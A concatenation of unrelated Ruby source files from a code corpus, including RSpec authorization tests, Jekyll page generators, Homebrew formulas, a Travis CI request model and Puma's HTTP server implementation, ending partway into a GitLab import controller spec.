#The Selling Partner API for Authorization helps developers manage authorizations and check the specific permissions associated with a given authorization.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::AuthorizationApiModel::AuthorizationCode
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'AuthorizationCode' do
before do
# run before each test
@instance = AmzSpApi::AuthorizationApiModel::AuthorizationCode.new
end
after do
# run after each test
end
describe 'test an instance of AuthorizationCode' do
it 'should create an instance of AuthorizationCode' do
expect(@instance).to be_instance_of(AmzSpApi::AuthorizationApiModel::AuthorizationCode)
end
end
describe 'test attribute "authorization_code"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 29.04878 | 155 | 0.7733 |
e89921520fdf5c04f8c1822f37c47d1c1270b6aa | 5,910 | require 'spec_helper'
describe Admin::FoldersController do
describe '#create' do
describe 'as admin' do
it 'allows to add folder for any account' do
account = create(:account)
sign_in(create(:user, :admin), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.to change { account.folders.count }
end
end
describe 'as account publisher' do
it 'does not allow to add folder to other account' do
account = create(:account)
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.not_to change { account.folders.count }
end
it 'allows to add folder for own account' do
account = create(:account)
sign_in(create(:user, :publisher, on: account), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.to change { account.folders.count }
end
it 'allows to add folder for account when multiple accounts are present' do
account = create(:account)
other_account = create(:account)
user = create(:user, :publisher, on: account)
create(:membership, user: user, entity: other_account, role: :publisher)
sign_in(user, scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: other_account)}
end.to change { other_account.folders.count }
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to add folder for entry/own account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
sign_in(user, scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: entry.account)}
end.not_to change { entry.account.folders.count }
end
end
end
describe '#update' do
describe 'as admin' do
it 'allows to change name of folder for any account' do
folder = create(:folder)
sign_in(create(:user, :admin), scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('changed')
end
it 'does not allow to change account of folder' do
folder = create(:folder)
other_account = create(:account)
sign_in(create(:user, :admin), scope: :user)
patch :update, params: {id: folder, folder: {account_id: other_account}}
expect(folder.reload.account).not_to eq(other_account)
end
end
describe 'as account publisher' do
it 'does not allow to change name of folder of other account' do
folder = create(:folder, name: 'old')
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('old')
end
it 'allows to change name of folder of own account' do
folder = create(:folder, name: 'old')
user = create(:user, :publisher, on: folder.account)
sign_in(user, scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('changed')
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to change name of folder of entry account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
folder = create(:folder, name: 'old', account: entry.account)
sign_in(user, scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('old')
end
end
end
describe '#destroy' do
describe 'as admin' do
it 'allows to destroy folder of any account' do
folder = create(:folder)
sign_in(create(:user, :admin), scope: :user)
expect do
delete :destroy, params: {id: folder}
end.to change { Pageflow::Folder.count }
end
end
describe 'as account publisher' do
it 'does not allow to destroy folder of other account' do
folder = create(:folder)
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
expect do
delete :destroy, params: {id: folder}
end.not_to change { Pageflow::Folder.count }
end
it 'allows to destroy folder of own account' do
folder = create(:folder)
user = create(:user, :publisher, on: folder.account)
sign_in(user, scope: :user)
expect do
delete :destroy, params: {id: folder}
end.to change { Pageflow::Folder.count }
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to destroy folder of entry account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
folder = create(:folder, account: entry.account)
sign_in(user, scope: :user)
expect do
delete :destroy, params: {id: folder}
end.not_to change { Pageflow::Folder.count }
end
end
end
end
| 33.202247 | 92 | 0.620812 |
219656818ffa5cf00a13189270bfe453ea89a7fd | 2,199 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Jekyll
require File.expand_path('../WFPage.rb', __FILE__)
class UpdatesTagPage < UpdatePage
def initialize(site, path, langcode, tag, updates)
if path.nil?
dir = File.join('updates', 'tags')
else
dir = File.join('updates', path, 'tags')
end
name = "#{tag}.html"
super(site, dir, name, langcode)
title_text = "All updates tagged: " + tag
description_text = "All updates tagged: " + tag
self.data['html_css_file'] = site.config['WFBaseUrl'] + '/styles/updates.css';
self.data['title'] = title_text
self.data['description'] = description_text
self.data['rss'] = false
self.data['tag'] = tag
self.data['updates'] = updates
self.data['theme_color'] = '#4527A0'
self.read_yaml(File.join(site.source, '_layouts'), 'updates/tag.liquid')
end
end
class UpdatesTagsPage < UpdatePage
def initialize(site, path, langcode, tags)
if path.nil?
dir = File.join('updates', 'tags')
else
dir = File.join('updates', path, 'tags')
end
name = "index.html"
super(site, dir, name, langcode)
title_text = "Filter by tag"
description_text = "Filter posts by tag"
self.data['html_css_file'] = site.config['WFBaseUrl'] + '/styles/updates.css';
self.data['title'] = title_text
self.data['description'] = description_text
self.data['rss'] = false
self.data['tag_path'] = dir
self.data['tags'] = tags
self.read_yaml(File.join(site.source, '_layouts'), 'updates/tags.liquid')
end
end
end
| 31.414286 | 84 | 0.652569 |
6ae55176032ec3ba4950cb6b173c056de8d48f0a | 459 | module UnpackStrategy
class Gzip
include UnpackStrategy
def self.can_extract?(path:, magic_number:)
magic_number.match?(/\A\037\213/n)
end
private
def extract_to_dir(unpack_dir, basename:, verbose:)
FileUtils.cp path, unpack_dir/basename, preserve: true
quiet_flags = verbose ? [] : ["-q"]
system_command! "gunzip",
args: [*quiet_flags, "-N", "--", unpack_dir/basename]
end
end
end
| 24.157895 | 75 | 0.627451 |
e2e96bf4c7db509f265b02eaf2a1c1707a1613c4 | 2,468 | require 'active_record'
require 'simple_states'
require 'travis/model/encrypted_column'
# Models an incoming request. The only supported source for requests currently is Github.
#
# The Request will be configured by fetching `.travis.yml` from the Github API
# and needs to be approved based on the configuration. Once approved the
# Request creates a Build.
class Request < Travis::Model
require 'travis/model/request/pull_request'
include SimpleStates
serialize :token, Travis::Model::EncryptedColumn.new(disable: true)
class << self
def last_by_head_commit(head_commit)
where(head_commit: head_commit).order(:id).last
end
def older_than(id)
recent.where('id < ?', id)
end
def recent(limit = 25)
order('id DESC').limit(limit)
end
end
belongs_to :commit
belongs_to :repository
belongs_to :owner, polymorphic: true
has_many :builds
has_many :events, as: :source
validates :repository_id, presence: true
serialize :config
serialize :payload
def event_type
read_attribute(:event_type) || 'push'
end
def ref
payload['ref'] if payload
end
def branch_name
ref.scan(%r{refs/heads/(.*?)$}).flatten.first if ref
end
def tag_name
ref.scan(%r{refs/tags/(.*?)$}).flatten.first if ref
end
def api_request?
event_type == 'api'
end
def pull_request?
event_type == 'pull_request'
end
def pull_request
@pull_request ||= PullRequest.new(payload && payload['pull_request'])
end
def pull_request_title
pull_request.title if pull_request?
end
def pull_request_number
pull_request.number if pull_request?
end
def head_repo
pull_request.head_repo
end
def base_repo
pull_request.base_repo
end
def head_branch
pull_request.head_branch
end
def base_branch
pull_request.base_branch
end
def config_url
GH.full_url("repos/#{repository.slug}/contents/.travis.yml?ref=#{commit.commit}").to_s
end
def same_repo_pull_request?
begin
head_repo && base_repo && head_repo == base_repo
rescue => e
Travis.logger.error("[request:#{id}] Couldn't determine whether pull request is from the same repository: #{e.message}")
false
end
end
def creates_jobs?
Build::Config::Matrix.new(
Build::Config.new(config).normalize, multi_os: repository.multi_os_enabled?, dist_group_expansion: repository.dist_group_expansion_enabled?
).expand.size > 0
end
end
| 21.840708 | 145 | 0.708266 |
1c848ed3870f0f225b3ec12aa1418d84d793ed08 | 608 | module Carto
module Dbdirect
class MetadataManager
def initialize(config, metadata_server)
@config = config
@metadata = metadata_server
end
attr_reader :config
def save(key, ip_set = [])
@metadata.HSET(config['prefix_namespace'] + key, config['hash_key'], ip_set.join(','))
end
def get(key)
ip_set = @metadata.HGET(config['prefix_namespace'] + key, config['hash_key'])
ip_set.nil? ? [] : ip_set.split(',')
end
def reset(key)
@metadata.DEL(config['prefix_namespace'] + key)
end
end
end
end
| 22.518519 | 94 | 0.595395 |
b9269f175cc2411b05353e71a5d78c74e1b54712 | 28,318 | # frozen_string_literal: true
require 'stringio'
require 'puma/thread_pool'
require 'puma/const'
require 'puma/events'
require 'puma/null_io'
require 'puma/compat'
require 'puma/reactor'
require 'puma/client'
require 'puma/binder'
require 'puma/delegation'
require 'puma/accept_nonblock'
require 'puma/util'
require 'puma/puma_http11'
unless Puma.const_defined? "IOBuffer"
require 'puma/io_buffer'
end
require 'socket'
module Puma
# The HTTP Server itself. Serves out a single Rack app.
#
# This class is used by the `Puma::Single` and `Puma::Cluster` classes
# to generate one or more `Puma::Server` instances capable of handling requests.
# Each Puma process will contain one `Puma::Server` instacne.
#
# The `Puma::Server` instance pulls requests from the socket, adds them to a
# `Puma::Reactor` where they get eventually passed to a `Puma::ThreadPool`.
#
# Each `Puma::Server` will have one reactor and one thread pool.
class Server
include Puma::Const
extend Puma::Delegation
attr_reader :thread
attr_reader :events
attr_accessor :app
attr_accessor :min_threads
attr_accessor :max_threads
attr_accessor :persistent_timeout
attr_accessor :auto_trim_time
attr_accessor :reaping_time
attr_accessor :first_data_timeout
# Create a server for the rack app +app+.
#
# +events+ is an object which will be called when certain error events occur
# to be handled. See Puma::Events for the list of current methods to implement.
#
# Server#run returns a thread that you can join on to wait for the server
# to do its work.
#
def initialize(app, events=Events.stdio, options={})
@app = app
@events = events
@check, @notify = Puma::Util.pipe
@status = :stop
@min_threads = 0
@max_threads = 16
@auto_trim_time = 30
@reaping_time = 1
@thread = nil
@thread_pool = nil
@early_hints = nil
@persistent_timeout = options.fetch(:persistent_timeout, PERSISTENT_TIMEOUT)
@first_data_timeout = options.fetch(:first_data_timeout, FIRST_DATA_TIMEOUT)
@binder = Binder.new(events)
@own_binder = true
@leak_stack_on_error = true
@options = options
@queue_requests = options[:queue_requests].nil? ? true : options[:queue_requests]
ENV['RACK_ENV'] ||= "development"
@mode = :http
@precheck_closing = true
end
attr_accessor :binder, :leak_stack_on_error, :early_hints
forward :add_tcp_listener, :@binder
forward :add_ssl_listener, :@binder
forward :add_unix_listener, :@binder
forward :connected_port, :@binder
def inherit_binder(bind)
@binder = bind
@own_binder = false
end
def tcp_mode!
@mode = :tcp
end
# On Linux, use TCP_CORK to better control how the TCP stack
# packetizes our stream. This improves both latency and throughput.
#
if RUBY_PLATFORM =~ /linux/
UNPACK_TCP_STATE_FROM_TCP_INFO = "C".freeze
# 6 == Socket::IPPROTO_TCP
# 3 == TCP_CORK
# 1/0 == turn on/off
def cork_socket(socket)
begin
socket.setsockopt(6, 3, 1) if socket.kind_of? TCPSocket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
def uncork_socket(socket)
begin
socket.setsockopt(6, 3, 0) if socket.kind_of? TCPSocket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
def closed_socket?(socket)
return false unless socket.kind_of? TCPSocket
return false unless @precheck_closing
begin
tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
@precheck_closing = false
false
else
state = tcp_info.unpack(UNPACK_TCP_STATE_FROM_TCP_INFO)[0]
# TIME_WAIT: 6, CLOSE: 7, CLOSE_WAIT: 8, LAST_ACK: 9, CLOSING: 11
(state >= 6 && state <= 9) || state == 11
end
end
else
def cork_socket(socket)
end
def uncork_socket(socket)
end
def closed_socket?(socket)
false
end
end
def backlog
@thread_pool and @thread_pool.backlog
end
def running
@thread_pool and @thread_pool.spawned
end
# This number represents the number of requests that
# the server is capable of taking right now.
#
# For example if the number is 5 then it means
# there are 5 threads sitting idle ready to take
# a request. If one request comes in, then the
# value would be 4 until it finishes processing.
def pool_capacity
@thread_pool and @thread_pool.pool_capacity
end
# Lopez Mode == raw tcp apps
def run_lopez_mode(background=true)
@thread_pool = ThreadPool.new(@min_threads,
@max_threads,
Hash) do |client, tl|
io = client.to_io
addr = io.peeraddr.last
if addr.empty?
# Set unix socket addrs to localhost
addr = "127.0.0.1:0"
else
addr = "#{addr}:#{io.peeraddr[1]}"
end
env = { 'thread' => tl, REMOTE_ADDR => addr }
begin
@app.call env, client.to_io
rescue Object => e
STDERR.puts "! Detected exception at toplevel: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
end
client.close unless env['detach']
end
@events.fire :state, :running
if background
@thread = Thread.new { handle_servers_lopez_mode }
return @thread
else
handle_servers_lopez_mode
end
end
def handle_servers_lopez_mode
begin
check = @check
sockets = [check] + @binder.ios
pool = @thread_pool
while @status == :run
begin
ios = IO.select sockets
ios.first.each do |sock|
if sock == check
break if handle_check
else
begin
if io = sock.accept_nonblock
client = Client.new io, nil
pool << client
end
rescue SystemCallError
# nothing
rescue Errno::ECONNABORTED
# client closed the socket even before accept
begin
io.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
end
end
rescue Object => e
@events.unknown_error self, e, "Listen loop"
end
end
@events.fire :state, @status
graceful_shutdown if @status == :stop || @status == :restart
rescue Exception => e
STDERR.puts "Exception handling servers: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
ensure
begin
@check.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
@notify.close
if @status != :restart and @own_binder
@binder.close
end
end
@events.fire :state, :done
end
# Runs the server.
#
# If +background+ is true (the default) then a thread is spun
# up in the background to handle requests. Otherwise requests
# are handled synchronously.
#
def run(background=true)
BasicSocket.do_not_reverse_lookup = true
@events.fire :state, :booting
@status = :run
if @mode == :tcp
return run_lopez_mode(background)
end
queue_requests = @queue_requests
@thread_pool = ThreadPool.new(@min_threads,
@max_threads,
IOBuffer) do |client, buffer|
# Advertise this server into the thread
Thread.current[ThreadLocalKey] = self
process_now = false
begin
if queue_requests
process_now = client.eagerly_finish
else
client.finish
process_now = true
end
rescue MiniSSL::SSLError => e
ssl_socket = client.io
addr = ssl_socket.peeraddr.last
cert = ssl_socket.peercert
client.close
@events.ssl_error self, addr, cert, e
rescue HttpParserError => e
client.write_400
client.close
@events.parse_error self, client.env, e
rescue ConnectionError, EOFError
client.close
else
if process_now
process_client client, buffer
else
client.set_timeout @first_data_timeout
@reactor.add client
end
end
end
@thread_pool.clean_thread_locals = @options[:clean_thread_locals]
if queue_requests
@reactor = Reactor.new self, @thread_pool
@reactor.run_in_thread
end
if @reaping_time
@thread_pool.auto_reap!(@reaping_time)
end
if @auto_trim_time
@thread_pool.auto_trim!(@auto_trim_time)
end
@events.fire :state, :running
if background
@thread = Thread.new { handle_servers }
return @thread
else
handle_servers
end
end
def handle_servers
begin
check = @check
sockets = [check] + @binder.ios
pool = @thread_pool
queue_requests = @queue_requests
remote_addr_value = nil
remote_addr_header = nil
case @options[:remote_address]
when :value
remote_addr_value = @options[:remote_address_value]
when :header
remote_addr_header = @options[:remote_address_header]
end
while @status == :run
begin
ios = IO.select sockets
ios.first.each do |sock|
if sock == check
break if handle_check
else
begin
if io = sock.accept_nonblock
client = Client.new io, @binder.env(sock)
if remote_addr_value
client.peerip = remote_addr_value
elsif remote_addr_header
client.remote_addr_header = remote_addr_header
end
pool << client
pool.wait_until_not_full
end
rescue SystemCallError
# nothing
rescue Errno::ECONNABORTED
# client closed the socket even before accept
begin
io.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
end
end
rescue Object => e
@events.unknown_error self, e, "Listen loop"
end
end
@events.fire :state, @status
graceful_shutdown if @status == :stop || @status == :restart
if queue_requests
@reactor.clear!
@reactor.shutdown
end
rescue Exception => e
STDERR.puts "Exception handling servers: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
ensure
@check.close
@notify.close
if @status != :restart and @own_binder
@binder.close
end
end
@events.fire :state, :done
end
# :nodoc:
def handle_check
cmd = @check.read(1)
case cmd
when STOP_COMMAND
@status = :stop
return true
when HALT_COMMAND
@status = :halt
return true
when RESTART_COMMAND
@status = :restart
return true
end
return false
end
# Given a connection on +client+, handle the incoming requests.
#
# This method support HTTP Keep-Alive so it may, depending on if the client
# indicates that it supports keep alive, wait for another request before
# returning.
#
def process_client(client, buffer)
begin
clean_thread_locals = @options[:clean_thread_locals]
close_socket = true
requests = 0
while true
case handle_request(client, buffer)
when false
return
when :async
close_socket = false
return
when true
return unless @queue_requests
buffer.reset
ThreadPool.clean_thread_locals if clean_thread_locals
requests += 1
check_for_more_data = @status == :run
if requests >= MAX_FAST_INLINE
# This will mean that reset will only try to use the data it already
# has buffered and won't try to read more data. What this means is that
# every client, independent of their request speed, gets treated like a slow
# one once every MAX_FAST_INLINE requests.
check_for_more_data = false
end
unless client.reset(check_for_more_data)
close_socket = false
client.set_timeout @persistent_timeout
@reactor.add client
return
end
end
end
# The client disconnected while we were reading data
rescue ConnectionError
# Swallow them. The ensure tries to close +client+ down
# SSL handshake error
rescue MiniSSL::SSLError => e
lowlevel_error(e, client.env)
ssl_socket = client.io
addr = ssl_socket.peeraddr.last
cert = ssl_socket.peercert
close_socket = true
@events.ssl_error self, addr, cert, e
# The client doesn't know HTTP well
rescue HttpParserError => e
lowlevel_error(e, client.env)
client.write_400
@events.parse_error self, client.env, e
# Server error
rescue StandardError => e
lowlevel_error(e, client.env)
client.write_500
@events.unknown_error self, e, "Read"
ensure
buffer.reset
begin
client.close if close_socket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
# Already closed
rescue StandardError => e
@events.unknown_error self, e, "Client"
end
end
end
# Given a Hash +env+ for the request read from +client+, add
# and fixup keys to comply with Rack's env guidelines.
#
def normalize_env(env, client)
if host = env[HTTP_HOST]
if colon = host.index(":")
env[SERVER_NAME] = host[0, colon]
env[SERVER_PORT] = host[colon+1, host.bytesize]
else
env[SERVER_NAME] = host
env[SERVER_PORT] = default_server_port(env)
end
else
env[SERVER_NAME] = LOCALHOST
env[SERVER_PORT] = default_server_port(env)
end
unless env[REQUEST_PATH]
# it might be a dumbass full host request header
uri = URI.parse(env[REQUEST_URI])
env[REQUEST_PATH] = uri.path
raise "No REQUEST PATH" unless env[REQUEST_PATH]
# A nil env value will cause a LintError (and fatal errors elsewhere),
# so only set the env value if there actually is a value.
env[QUERY_STRING] = uri.query if uri.query
end
env[PATH_INFO] = env[REQUEST_PATH]
# From http://www.ietf.org/rfc/rfc3875 :
# "Script authors should be aware that the REMOTE_ADDR and
# REMOTE_HOST meta-variables (see sections 4.1.8 and 4.1.9)
# may not identify the ultimate source of the request.
# They identify the client for the immediate request to the
# server; that client may be a proxy, gateway, or other
# intermediary acting on behalf of the actual source client."
#
unless env.key?(REMOTE_ADDR)
begin
addr = client.peerip
rescue Errno::ENOTCONN
# Client disconnects can result in an inability to get the
# peeraddr from the socket; default to localhost.
addr = LOCALHOST_IP
end
# Set unix socket addrs to localhost
addr = LOCALHOST_IP if addr.empty?
env[REMOTE_ADDR] = addr
end
end
def default_server_port(env)
return PORT_443 if env[HTTPS_KEY] == 'on' || env[HTTPS_KEY] == 'https'
env['HTTP_X_FORWARDED_PROTO'] == 'https' ? PORT_443 : PORT_80
end
# Given the request +env+ from +client+ and a partial request body
# in +body+, finish reading the body if there is one and invoke
# the rack app. Then construct the response and write it back to
# +client+
#
# +cl+ is the previously fetched Content-Length header if there
# was one. This is an optimization to keep from having to look
# it up again.
#
def handle_request(req, lines)
env = req.env
client = req.io
return false if closed_socket?(client)
normalize_env env, req
env[PUMA_SOCKET] = client
if env[HTTPS_KEY] && client.peercert
env[PUMA_PEERCERT] = client.peercert
end
env[HIJACK_P] = true
env[HIJACK] = req
body = req.body
head = env[REQUEST_METHOD] == HEAD
env[RACK_INPUT] = body
env[RACK_URL_SCHEME] = env[HTTPS_KEY] ? HTTPS : HTTP
if @early_hints
env[EARLY_HINTS] = lambda { |headers|
fast_write client, "HTTP/1.1 103 Early Hints\r\n".freeze
headers.each_pair do |k, vs|
if vs.respond_to?(:to_s) && !vs.to_s.empty?
vs.to_s.split(NEWLINE).each do |v|
fast_write client, "#{k}: #{v}\r\n"
end
else
fast_write client, "#{k}: #{vs}\r\n"
end
end
fast_write client, "\r\n".freeze
}
end
# A rack extension. If the app writes #call'ables to this
# array, we will invoke them when the request is done.
#
after_reply = env[RACK_AFTER_REPLY] = []
begin
begin
status, headers, res_body = @app.call(env)
return :async if req.hijacked
status = status.to_i
if status == -1
unless headers.empty? and res_body == []
raise "async response must have empty headers and body"
end
return :async
end
rescue ThreadPool::ForceShutdown => e
@events.log "Detected force shutdown of a thread, returning 503"
@events.unknown_error self, e, "Rack app"
status = 503
headers = {}
res_body = ["Request was internally terminated early\n"]
rescue Exception => e
@events.unknown_error self, e, "Rack app", env
status, headers, res_body = lowlevel_error(e, env)
end
content_length = nil
no_body = head
if res_body.kind_of? Array and res_body.size == 1
content_length = res_body[0].bytesize
end
cork_socket client
line_ending = LINE_END
colon = COLON
http_11 = if env[HTTP_VERSION] == HTTP_11
allow_chunked = true
keep_alive = env.fetch(HTTP_CONNECTION, "").downcase != CLOSE
include_keepalive_header = false
# An optimization. The most common response is 200, so we can
# reply with the proper 200 status without having to compute
# the response header.
#
if status == 200
lines << HTTP_11_200
else
lines.append "HTTP/1.1 ", status.to_s, " ",
fetch_status_code(status), line_ending
no_body ||= status < 200 || STATUS_WITH_NO_ENTITY_BODY[status]
end
true
else
allow_chunked = false
keep_alive = env.fetch(HTTP_CONNECTION, "").downcase == KEEP_ALIVE
include_keepalive_header = keep_alive
# Same optimization as above for HTTP/1.1
#
if status == 200
lines << HTTP_10_200
else
lines.append "HTTP/1.0 ", status.to_s, " ",
fetch_status_code(status), line_ending
no_body ||= status < 200 || STATUS_WITH_NO_ENTITY_BODY[status]
end
false
end
response_hijack = nil
headers.each do |k, vs|
case k.downcase
when CONTENT_LENGTH2
content_length = vs
next
when TRANSFER_ENCODING
allow_chunked = false
content_length = nil
when HIJACK
response_hijack = vs
next
end
if vs.respond_to?(:to_s) && !vs.to_s.empty?
vs.to_s.split(NEWLINE).each do |v|
lines.append k, colon, v, line_ending
end
else
lines.append k, colon, line_ending
end
end
if include_keepalive_header
lines << CONNECTION_KEEP_ALIVE
elsif http_11 && !keep_alive
lines << CONNECTION_CLOSE
end
if no_body
if content_length and status != 204
lines.append CONTENT_LENGTH_S, content_length.to_s, line_ending
end
lines << line_ending
fast_write client, lines.to_s
return keep_alive
end
if content_length
lines.append CONTENT_LENGTH_S, content_length.to_s, line_ending
chunked = false
elsif !response_hijack and allow_chunked
lines << TRANSFER_ENCODING_CHUNKED
chunked = true
end
lines << line_ending
fast_write client, lines.to_s
if response_hijack
response_hijack.call client
return :async
end
begin
res_body.each do |part|
next if part.bytesize.zero?
if chunked
fast_write client, part.bytesize.to_s(16)
fast_write client, line_ending
fast_write client, part
fast_write client, line_ending
else
fast_write client, part
end
client.flush
end
if chunked
fast_write client, CLOSE_CHUNKED
client.flush
end
rescue SystemCallError, IOError
raise ConnectionError, "Connection error detected during write"
end
ensure
uncork_socket client
body.close
req.tempfile.unlink if req.tempfile
res_body.close if res_body.respond_to? :close
after_reply.each { |o| o.call }
end
return keep_alive
end
def fetch_status_code(status)
HTTP_STATUS_CODES.fetch(status) { 'CUSTOM' }
end
private :fetch_status_code
# Given the request +env+ from +client+ and the partial body +body+
# plus a potential Content-Length value +cl+, finish reading
# the body and return it.
#
# If the body is larger than MAX_BODY, a Tempfile object is used
# for the body, otherwise a StringIO is used.
#
def read_body(env, client, body, cl)
content_length = cl.to_i
remain = content_length - body.bytesize
return StringIO.new(body) if remain <= 0
# Use a Tempfile if there is a lot of data left
if remain > MAX_BODY
stream = Tempfile.new(Const::PUMA_TMP_BASE)
stream.binmode
else
# The body[0,0] trick is to get an empty string in the same
# encoding as body.
stream = StringIO.new body[0,0]
end
stream.write body
# Read an odd sized chunk so we can read even sized ones
# after this
chunk = client.readpartial(remain % CHUNK_SIZE)
# No chunk means a closed socket
unless chunk
stream.close
return nil
end
remain -= stream.write(chunk)
# Raed the rest of the chunks
while remain > 0
chunk = client.readpartial(CHUNK_SIZE)
unless chunk
stream.close
return nil
end
remain -= stream.write(chunk)
end
stream.rewind
return stream
end
# A fallback rack response if +@app+ raises as exception.
#
def lowlevel_error(e, env)
if handler = @options[:lowlevel_error_handler]
if handler.arity == 1
return handler.call(e)
else
return handler.call(e, env)
end
end
if @leak_stack_on_error
[500, {}, ["Puma caught this error: #{e.message} (#{e.class})\n#{e.backtrace.join("\n")}"]]
else
[500, {}, ["An unhandled lowlevel error occurred. The application logs may have details.\n"]]
end
end
# Wait for all outstanding requests to finish.
#
def graceful_shutdown
if @options[:shutdown_debug]
threads = Thread.list
total = threads.size
pid = Process.pid
$stdout.syswrite "#{pid}: === Begin thread backtrace dump ===\n"
threads.each_with_index do |t,i|
$stdout.syswrite "#{pid}: Thread #{i+1}/#{total}: #{t.inspect}\n"
$stdout.syswrite "#{pid}: #{t.backtrace.join("\n#{pid}: ")}\n\n"
end
$stdout.syswrite "#{pid}: === End thread backtrace dump ===\n"
end
if @options[:drain_on_shutdown]
count = 0
while true
ios = IO.select @binder.ios, nil, nil, 0
break unless ios
ios.first.each do |sock|
begin
if io = sock.accept_nonblock
count += 1
client = Client.new io, @binder.env(sock)
@thread_pool << client
end
rescue SystemCallError
end
end
end
@events.debug "Drained #{count} additional connections."
end
if @thread_pool
if timeout = @options[:force_shutdown_after]
@thread_pool.shutdown timeout.to_i
else
@thread_pool.shutdown
end
end
end
def notify_safely(message)
begin
@notify << message
rescue IOError
# The server, in another thread, is shutting down
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
rescue RuntimeError => e
# Temporary workaround for https://bugs.ruby-lang.org/issues/13239
if e.message.include?('IOError')
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
else
raise e
end
end
end
private :notify_safely
# Stops the acceptor thread and then causes the worker threads to finish
# off the request queue before finally exiting.
def stop(sync=false)
notify_safely(STOP_COMMAND)
@thread.join if @thread && sync
end
def halt(sync=false)
notify_safely(HALT_COMMAND)
@thread.join if @thread && sync
end
def begin_restart
notify_safely(RESTART_COMMAND)
end
def fast_write(io, str)
n = 0
while true
begin
n = io.syswrite str
rescue Errno::EAGAIN, Errno::EWOULDBLOCK
if !IO.select(nil, [io], nil, WRITE_TIMEOUT)
raise ConnectionError, "Socket timeout writing data"
end
retry
rescue Errno::EPIPE, SystemCallError, IOError
raise ConnectionError, "Socket timeout writing data"
end
return if n == str.bytesize
str = str.byteslice(n..-1)
end
end
private :fast_write
ThreadLocalKey = :puma_server
def self.current
Thread.current[ThreadLocalKey]
end
def shutting_down?
@status == :stop || @status == :restart
end
end
end
| 27.386847 | 109 | 0.58394 |
ed0a95704046a455fa0e9638e4c5f17061bbada6 | 1,033 | require "language/node"
class BalenaCli < Formula
desc "The official balena CLI tool"
homepage "https://www.balena.io/docs/reference/cli/"
# balena-cli should only be updated every 10 releases on multiples of 10
url "https://registry.npmjs.org/balena-cli/-/balena-cli-12.7.0.tgz"
sha256 "f48464426b086a5e0eb388b4e07d1412260dbe5381b62cd79fe71c608622b6e1"
license "Apache-2.0"
bottle do
sha256 "12e8dd44d5fe88d66834c35e6841cffa16eb1cf876d91e83a9a6ba0f98f7d6ac" => :catalina
sha256 "6da74df0e72ac657e659c951febdaf41b9ab4ee44115727a6e6e861c2ff20d3b" => :mojave
sha256 "c3ffb0fc4847f494c4a1067019bdf8869763d975dd54e4e2a45d513d8603d8ec" => :high_sierra
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
assert_match "Logging in to balena-cloud.com",
shell_output("#{bin}/balena login --credentials --email [email protected] --password secret 2>/dev/null", 1)
end
end
| 35.62069 | 114 | 0.762827 |
fffbc805335e39fb20302342fadb94db21c547fa | 902 | require 'spec_helper'
describe Import::FogbugzController do
include ImportSpecHelper
let(:user) { create(:user) }
before do
sign_in(user)
end
describe 'GET status' do
before do
@repo = OpenStruct.new(name: 'vim')
stub_client(valid?: true)
end
it 'assigns variables' do
@project = create(:empty_project, import_type: 'fogbugz', creator_id: user.id)
stub_client(repos: [@repo])
get :status
